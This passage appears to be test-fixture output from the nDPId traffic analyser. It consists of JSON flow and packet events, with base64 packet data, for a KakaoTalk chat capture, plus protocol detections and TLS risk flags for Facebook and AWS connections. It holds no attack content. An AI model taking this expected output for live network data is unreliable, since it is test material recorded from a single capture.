00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069044758,"flow_last_seen":1430069044758,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1430069044758,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1430069044758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":303,"pkt_l4_len":267,"thread_ts_msec":1430069044758,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAR8KJUAAjgb4zIuWAH0KGFK8Abu3Y2Ij0KVRKAPiUBigLueuAADzAAAApDlIVrVdqRc+Gkt7POZ3i2OlkuY4MMfPTZY9G4U0YFfr\/Io7pOCQe3JDBNAmPdEpHGIlOOWztPzNgfmCZdfJbXa\/FjyLrCbe\/cKrmuhEYDyIPsoQcOHY3YFPdOkSmKChheXsyu06po9uQ1CWTJDZfqoByGUY9M3+\/torvsssHclmFyrgMhiQBPDR+\/p96Y\/\/sK6VRP8W+SfBO5i7Jg3brhWvS81m7IbytFR73ZERAlFn0QejuZzhem715ywfbXU8ySrwRBK2cs3ywClzqW\/s7h0teJNcn45XHRR+Z0ZTPA29+kHM57k5C1faf1I\/3jeLMDw\/"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1430069044836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069044836,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTekAAQAZ+bgoYUryLlgB9t2MBu1EoA+JiI9GcUBCIgOkBAAA="}
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1430069044940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069044940,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLTe0AAQAZ+QwoYUryLlgB9t2MBu1EoA+JiI9GcUBiIgH9kAAAmAAAApDlIVrVdqRc+Gkt7POZ3i2OlX+Y4MArPTZYlBp4hfXC7UiHVW\/8="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1430069048642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069048642,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkakAAjgapGtJn8A8KGFK8AbulXNdU3uvmK0ykUBSkj1vNAAA="}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069049770,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUZ0AAQAZSqgoYUrytwki8h34UbGWkOWcyCtXvgBgB12cmAAABAQgKAAKaQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069060011,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkUAAQAbmZgoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069072945,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTTnkAAQAbVigoYUrw2\/\/3H5i8UZ+uf0YYGiXPCgBQCY5HBAAABAQgKAAKjTTTnT0k="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069072986,"flow_last_seen":1430069072986,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069072986,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1430069072986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069072986,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwsMEAAQAZ88QoYUrw2\/\/3H5lQUZzqvj2AAAAAAoAI2sJHJAAACBAV4BAIICgACo1AAAAAAAQMDBQ=="}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1430069073186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069073186,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQa8ITb\/\/ccKGFK8FGfmVG+Fj0U6r49hoBJF6jkFAAACBAV4BAIICjTom84AAqNQAQMDCA=="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1430069073186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069073186,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQsMUAAQAZ8+AoYUrw2\/\/3H5lQUZzqvj2FvhY9GgBABtpHBAAABAQgKAAKjZTTom84="}
01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACw2WEAA+AaMPh8NRFQKGFK8Abuwm2JwnlDLT2hEYBIRHOBVAAACBAV4"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1430069031284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031284,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChjD0AAPwYYjAoYUrwfDURUsJsBu8tPaERicJ5RUBA5CM\/qAAA="}
00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01039{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
01829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7560000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1430069031611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":113,"pkt_l4_len":77,"thread_ts_msec":1430069031611,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGHTnUAAQAbVXgoYUrw2\/\/3H5i8UZ+uf0VkGiXPCgBgCYxkQAAABAQgKAAKTKDTnT0kXAwEAKNOo\/lFrrxEtj1oyrBEybZXAvF7754xqLjvuYfV0gCpDpumAA3\/lW60="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035398,"flow_last_seen":1430069035398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069035398,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1430069035398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChV8UAAQAbFkwoYUrzSZ\/APpVwBu+YrTKNirTiWUBFpAB9mAAA="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1430069035537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035537,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkaUAAjgapG9Jn8A8KGFK8AbulXGKtOJbmK0ykUBCkj3bOAAA="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035840,"flow_last_seen":1430069035840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1430069035840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035840,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADytk0AAPwbN8woYUrwfDURUkrUAUM0qoIsAAAAAoAI5CEEgAAACBAV4BAIICgALDRgAAAAAAQMDBw=="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1430069035877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069035877,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxm7kAA+AZbqB8NRFQKGFK8AFCStWTibgPNKqCMYBIRHPNeAAACBAV4"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1430069035880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035880,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACitlEAAPwbOBgoYUrwfDURUkrUAUM0qoIxk4m4EUBA5COLzAAA="}
00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035967,"flow_last_seen":1430069035967,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035967,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1430069035967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035967,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzw1UAAPwaKsQoYUrwfDURUsJ0Bu3W4\/fMAAAAAoAI5CBvJAAACBAV4BAIICgALDSYAAAAAAQMDBw=="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1430069036008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036008,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxGQkAA+AZ8VB8NRFQKGFK8AbuwnWIYU8F1uP30YBIRHOshAAACBAV4"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1430069036010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036010,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjw1kAAPwaKxAoYUrwfDURUsJ0Bu3W4\/fRiGFPCUBA5CNq2AAA="}
00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069036068,"flow_last_seen":1430069036068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069036068,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1430069036068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069036068,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwqSkAAPwalnwoYUryt\/GECircBu1PEJ3oAAAAAoAI5CI51AAACBAV4BAIICgALDTAAAAAAAQMDBw=="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1430069036109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036109,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACzrl0AA+AYrYa38YQIKGFK8AbuKt2bo6WFTxCd7YBIRHMNnAAACBAV4"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1430069036113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036113,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgqS0AAPwalsgoYUryt\/GECircBu1PEJ3tm6OliUBA5CLL8AAA="}
00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 